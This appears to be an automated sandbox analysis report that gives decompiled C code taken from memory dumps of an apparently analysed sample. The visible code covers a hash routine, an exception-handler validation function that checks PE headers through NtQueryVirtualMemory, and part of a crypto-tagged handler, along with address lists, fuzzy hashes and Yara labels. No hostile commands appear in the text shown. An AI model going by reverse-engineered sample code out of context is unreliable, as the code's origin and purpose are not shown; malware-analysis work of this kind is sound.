				_t745 = (( !_t383 | _t443) ^ _t257) + _v52 + _t743 - 0x5cfebcec + _t443;
				asm("ror edi, 0xb");
				_t678 = (( !_t257 | _t745) ^ _t443) + _v24 + _t383 + 0x4e0811a1 + _t745;
				asm("rol eax, 0x6");
				_t259 = (( !_t443 | _t678) ^ _t745) + _v60 + _t257 - 0x8ac817e + _t678;
				asm("rol edx, 0xa");
				_t445 = (( !_t745 | _t259) ^ _t678) + _v32 + _t443 - 0x42c50dcb + _t259;
				_t399 = _a4;
				asm("rol esi, 0xf");
				_t747 = (( !_t678 | _t445) ^ _t259) + _v68 + _t745 + 0x2ad7d2bb + _t445;
				 *_t399 =  *_t399 + _t259;
				asm("ror eax, 0xb");
				 *((intOrPtr*)(_t399 + 4)) = (( !_t259 | _t747) ^ _t445) + _v40 + _t678 - 0x14792c6f +  *((intOrPtr*)(_t399 + 4)) + _t747;
				 *((intOrPtr*)(_t399 + 8)) =  *((intOrPtr*)(_t399 + 8)) + _t747;
				 *((intOrPtr*)(_t399 + 0xc)) =  *((intOrPtr*)(_t399 + 0xc)) + _t445;
				return memset( &_v76, 0, 0x40);
			}

0x011d310c
0x011d3117
0x011d311a
0x011d311d
0x011d311e
0x011d311e
0x011d3129
0x011d313a
0x011d313c
0x011d313f
0x011d313f
0x011d3142
0x011d3142
0x011d3145
0x011d3145
0x011d3148
0x011d3148
0x011d3165
0x011d3168
0x011d317e
0x011d3181
0x011d319b
0x011d319e
0x011d31b4
0x011d31b7
0x011d31b9
0x011d31d1
0x011d31d4
0x011d31d7
0x011d31ef
0x011d31f2
0x011d320c
0x011d320f
0x011d3225
0x011d3228
0x011d322a
0x011d3242
0x011d3247
0x011d324a
0x011d3260
0x011d3263
0x011d327d
0x011d3280
0x011d3296
0x011d3299
0x011d329b
0x011d32b6
0x011d32b9
0x011d32d0
0x011d32d3
0x011d32d7
0x011d32f0
0x011d32f3
0x011d32f5
0x011d32f8
0x011d3313
0x011d3316
0x011d332f
0x011d3332
0x011d3342
0x011d3345
0x011d335d
0x011d3360
0x011d337a
0x011d337d
0x011d3395
0x011d3398
0x011d33ae
0x011d33b1
0x011d33c9
0x011d33cc
0x011d33e4
0x011d33e7
0x011d3401
0x011d3404
0x011d341a
0x011d341d
0x011d3435
0x011d3438
0x011d3452
0x011d3455
0x011d346d
0x011d3470
0x011d3486
0x011d3489
0x011d34a1
0x011d34a4
0x011d34bc
0x011d34bf
0x011d34d1
0x011d34d4
0x011d34e6
0x011d34e9
0x011d34fb
0x011d34fe
0x011d3502
0x011d3512
0x011d3515
0x011d3523
0x011d3526
0x011d3538
0x011d353b
0x011d354f
0x011d3552
0x011d3554
0x011d3564
0x011d3567
0x011d3579
0x011d357c
0x011d358a
0x011d358d
0x011d359f
0x011d35a2
0x011d35a6
0x011d35b6
0x011d35b9
0x011d35cb
0x011d35ce
0x011d35dc
0x011d35df
0x011d35f1
0x011d35f4
0x011d3606
0x011d3609
0x011d361d
0x011d3620
0x011d3634
0x011d3637
0x011d364b
0x011d364e
0x011d3662
0x011d3665
0x011d3679
0x011d367c
0x011d3690
0x011d3695
0x011d36a7
0x011d36aa
0x011d36be
0x011d36c1
0x011d36d5
0x011d36d8
0x011d36ee
0x011d36f1
0x011d3705
0x011d3708
0x011d371a
0x011d371d
0x011d3731
0x011d3734
0x011d3748
0x011d374b
0x011d375f
0x011d3768
0x011d376b
0x011d3774
0x011d377d
0x011d3785
0x011d378d
0x011d3797
0x011d37ac

APIs

memset.NTDLL ref: 011D37A0

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
Instruction ID: 17c3bd32ef3a3c609526a4be0efc2ffc69730d1600482a7de416a591167cfc1a
Opcode Fuzzy Hash: caaa9dbbb7e7814dcf9633512e25e7f41fdb6dba46993faf2c792e9f7bab9068
Instruction Fuzzy Hash: EE22847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0

Uniqueness

Uniqueness Score: -1.00%

Function 010E2485, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010E2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x10e41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x10e4240 = 1;
										__eflags =  *0x10e4240;
										if( *0x10e4240 != 0) {
											goto L60;
										}
										_t84 =  *0x10e41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x10e4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x10e41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x10e4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x10e41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10e4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10e4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x10e4240 = 1;
							__eflags =  *0x10e4240;
							if( *0x10e4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10e4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10e4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x10e4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10e4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10e41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10e4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10e4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x010e248f
0x010e2492
0x010e2498
0x010e24b6
0x00000000
0x010e24b6
0x010e24a0
0x010e24a9
0x010e24af
0x010e24be
0x010e24c1
0x010e24c4
0x010e24ce
0x010e24ce
0x010e24d0
0x010e24d3
0x010e24d5
0x010e24d5
0x010e24d7
0x010e24da
0x00000000
0x00000000
0x010e24dc
0x010e24de
0x010e2544
0x010e2544
0x010e26a2
0x00000000
0x010e26a2
0x010e24e0
0x010e24e0
0x010e24e4
0x010e24e6
0x010e24e6
0x010e24e6
0x010e24e6
0x010e24e9
0x010e24ea
0x010e24ed
0x010e24ed
0x010e24f1
0x010e24f5
0x010e2503
0x010e2503
0x010e250b
0x010e2511
0x010e2513
0x010e2515
0x010e2525
0x010e2532
0x010e2536
0x010e253b
0x010e253d
0x010e25bb
0x010e25bb
0x010e253f
0x010e253f
0x010e253f
0x010e25bd
0x010e25bf
0x010e26a0
0x010e26a0
0x00000000
0x010e25c5
0x010e25c5
0x010e25cc
0x00000000
0x00000000
0x010e25d2
0x010e25d6
0x010e2632
0x010e2634
0x010e263c
0x010e263e
0x010e2640
0x00000000
0x00000000
0x010e2642
0x010e2648
0x010e264a
0x010e264c
0x010e2661
0x010e2661
0x010e2663
0x010e2692
0x010e2699
0x00000000
0x010e2699
0x010e2667
0x010e2668
0x010e266a
0x010e266c
0x010e266c
0x010e266e
0x010e2670
0x010e2672
0x010e2686
0x010e2686
0x010e2689
0x010e268b
0x010e268b
0x010e268c
0x010e268c
0x00000000
0x010e2674
0x010e2674
0x010e2674
0x010e267d
0x010e267e
0x010e2680
0x010e2682
0x010e2682
0x00000000
0x010e2674
0x010e2672
0x010e264e
0x010e2655
0x010e2655
0x010e2657
0x00000000
0x00000000
0x010e2659
0x010e265a
0x010e265d
0x010e265f
0x00000000
0x00000000
0x00000000
0x010e265f
0x00000000
0x010e2655
0x010e25d8
0x010e25db
0x010e25e0
0x00000000
0x00000000
0x010e25e9
0x010e25eb
0x010e25f1
0x00000000
0x00000000
0x010e25f7
0x010e25fd
0x00000000
0x00000000
0x010e2603
0x010e2605
0x010e260e
0x010e2612
0x00000000
0x00000000
0x010e2618
0x010e261b
0x010e261d
0x00000000
0x00000000
0x010e2624
0x010e2626
0x00000000
0x00000000
0x010e2628
0x010e262c
0x00000000
0x00000000
0x00000000
0x010e262c
0x00000000
0x00000000
0x00000000
0x010e2517
0x010e2517
0x010e2517
0x010e251e
0x00000000
0x00000000
0x010e2520
0x010e2521
0x010e2523
0x00000000
0x00000000
0x00000000
0x010e2523
0x010e254b
0x010e254d
0x00000000
0x00000000
0x010e255d
0x010e255f
0x010e2561
0x00000000
0x00000000
0x010e2567
0x010e256e
0x010e259a
0x010e259a
0x010e259c
0x010e259e
0x010e25b2
0x010e25b4
0x00000000
0x00000000
0x00000000
0x00000000
0x010e25a0
0x010e25a0
0x010e25a0
0x010e25a9
0x010e25aa
0x010e25ac
0x010e25ae
0x010e25ae
0x00000000
0x010e25a0
0x010e2570
0x010e2573
0x010e2575
0x010e2587
0x010e2587
0x010e258a
0x010e258c
0x010e258c
0x010e258d
0x010e258d
0x010e2593
0x00000000
0x00000000
0x00000000
0x00000000
0x010e2577
0x010e2577
0x010e2577
0x010e257e
0x00000000
0x00000000
0x010e2580
0x010e2580
0x010e2581
0x00000000
0x00000000
0x00000000
0x010e2581
0x010e2583
0x010e2585
0x010e2598
0x00000000
0x00000000
0x00000000
0x010e2598
0x00000000
0x010e2585
0x010e24f7
0x010e24fa
0x010e24fd
0x00000000
0x00000000
0x010e24ff
0x010e2501
0x00000000
0x00000000
0x00000000
0x010e2501
0x010e24c6
0x010e24c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 010E2536

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 69d5aa2aa3d2333f6c15749da5756177a9971426ea0c7bedde71998add6ead8a
Instruction ID: 92e0846f1a4aeea48ece905d9dbee618f3902624d834dfeac3305334f9aef504
Opcode Fuzzy Hash: 69d5aa2aa3d2333f6c15749da5756177a9971426ea0c7bedde71998add6ead8a
Instruction Fuzzy Hash: AC6108717006028FDB6ACF2FD9A876977EDEB88314F2481A9D5D6CB285E731D881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 011D8005, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E011D8005(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x11da330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x11da378 = 1;
										__eflags =  *0x11da378;
										if( *0x11da378 != 0) {
											goto L60;
										}
										_t84 =  *0x11da330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x11da378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x11da330 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x11da338 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x11da334 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x11da338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x11da338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x11da378 = 1;
							__eflags =  *0x11da378;
							if( *0x11da378 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x11da338 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x11da338 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x11da378 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x11da338 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x11da330 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x11da338 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x11da338 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x011d800f
0x011d8012
0x011d8018
0x011d8036
0x00000000
0x011d8036
0x011d8020
0x011d8029
0x011d802f
0x011d803e
0x011d8041
0x011d8044
0x011d804e
0x011d804e
0x011d8050
0x011d8053
0x011d8055
0x011d8055
0x011d8057
0x011d805a
0x00000000
0x00000000
0x011d805c
0x011d805e
0x011d80c4
0x011d80c4
0x011d8222
0x00000000
0x011d8222
0x011d8060
0x011d8060
0x011d8064
0x011d8066
0x011d8066
0x011d8066
0x011d8066
0x011d8069
0x011d806a
0x011d806d
0x011d806d
0x011d8071
0x011d8075
0x011d8083
0x011d8083
0x011d808b
0x011d8091
0x011d8093
0x011d8095
0x011d80a5
0x011d80b2
0x011d80b6
0x011d80bb
0x011d80bd
0x011d813b
0x011d813b
0x011d80bf
0x011d80bf
0x011d80bf
0x011d813d
0x011d813f
0x011d8220
0x011d8220
0x00000000
0x011d8145
0x011d8145
0x011d814c
0x00000000
0x00000000
0x011d8152
0x011d8156
0x011d81b2
0x011d81b4
0x011d81bc
0x011d81be
0x011d81c0
0x00000000
0x00000000
0x011d81c2
0x011d81c8
0x011d81ca
0x011d81cc
0x011d81e1
0x011d81e1
0x011d81e3
0x011d8212
0x011d8219
0x00000000
0x011d8219
0x011d81e7
0x011d81e8
0x011d81ea
0x011d81ec
0x011d81ec
0x011d81ee
0x011d81f0
0x011d81f2
0x011d8206
0x011d8206
0x011d8209
0x011d820b
0x011d820b
0x011d820c
0x011d820c
0x00000000
0x011d81f4
0x011d81f4
0x011d81f4
0x011d81fd
0x011d81fe
0x011d8200
0x011d8202
0x011d8202
0x00000000
0x011d81f4
0x011d81f2
0x011d81ce
0x011d81d5
0x011d81d5
0x011d81d7
0x00000000
0x00000000
0x011d81d9
0x011d81da
0x011d81dd
0x011d81df
0x00000000
0x00000000
0x00000000
0x011d81df
0x00000000
0x011d81d5
0x011d8158
0x011d815b
0x011d8160
0x00000000
0x00000000
0x011d8169
0x011d816b
0x011d8171
0x00000000
0x00000000
0x011d8177
0x011d817d
0x00000000
0x00000000
0x011d8183
0x011d8185
0x011d818e
0x011d8192
0x00000000
0x00000000
0x011d8198
0x011d819b
0x011d819d
0x00000000
0x00000000
0x011d81a4
0x011d81a6
0x00000000
0x00000000
0x011d81a8
0x011d81ac
0x00000000
0x00000000
0x00000000
0x011d81ac
0x00000000
0x00000000
0x00000000
0x011d8097
0x011d8097
0x011d8097
0x011d809e
0x00000000
0x00000000
0x011d80a0
0x011d80a1
0x011d80a3
0x00000000
0x00000000
0x00000000
0x011d80a3
0x011d80cb
0x011d80cd
0x00000000
0x00000000
0x011d80dd
0x011d80df
0x011d80e1
0x00000000
0x00000000
0x011d80e7
0x011d80ee
0x011d811a
0x011d811a
0x011d811c
0x011d811e
0x011d8132
0x011d8134
0x00000000
0x00000000
0x00000000
0x00000000
0x011d8120
0x011d8120
0x011d8120
0x011d8129
0x011d812a
0x011d812c
0x011d812e
0x011d812e
0x00000000
0x011d8120
0x011d80f0
0x011d80f0
0x011d80f3
0x011d80f5
0x011d8107
0x011d8107
0x011d810a
0x011d810c
0x011d810c
0x011d810d
0x011d810d
0x011d8113
0x011d8113
0x00000000
0x00000000
0x00000000
0x00000000
0x011d80f7
0x011d80f7
0x011d80f7
0x011d80fe
0x00000000
0x00000000
0x011d8100
0x011d8100
0x011d8101
0x00000000
0x00000000
0x00000000
0x011d8101
0x011d8103
0x011d8105
0x011d8118
0x00000000
0x00000000
0x00000000
0x011d8118
0x00000000
0x011d8105
0x011d8077
0x011d807a
0x011d807d
0x00000000
0x00000000
0x011d807f
0x011d8081
0x00000000
0x00000000
0x00000000
0x011d8081
0x011d8046
0x011d8048
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 011D80B6

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: aa0f441b8e1a9d27a136725c4d596c7aa3bb4f746340b3dfee1a357d96800c61
Instruction ID: d1d79bc398ded276d2093cd9cc554874d241f6e8f460aa6576310d9c555aaab8
Opcode Fuzzy Hash: aa0f441b8e1a9d27a136725c4d596c7aa3bb4f746340b3dfee1a357d96800c61
Instruction Fuzzy Hash: 5961BF30A05A029FDB2ECE3CE8D072977A6FF85354F288179D956C7285EB71D886C740

Uniqueness

Uniqueness Score: -1.00%

Function 010E2264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E010E2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E010E23CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E010E2485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
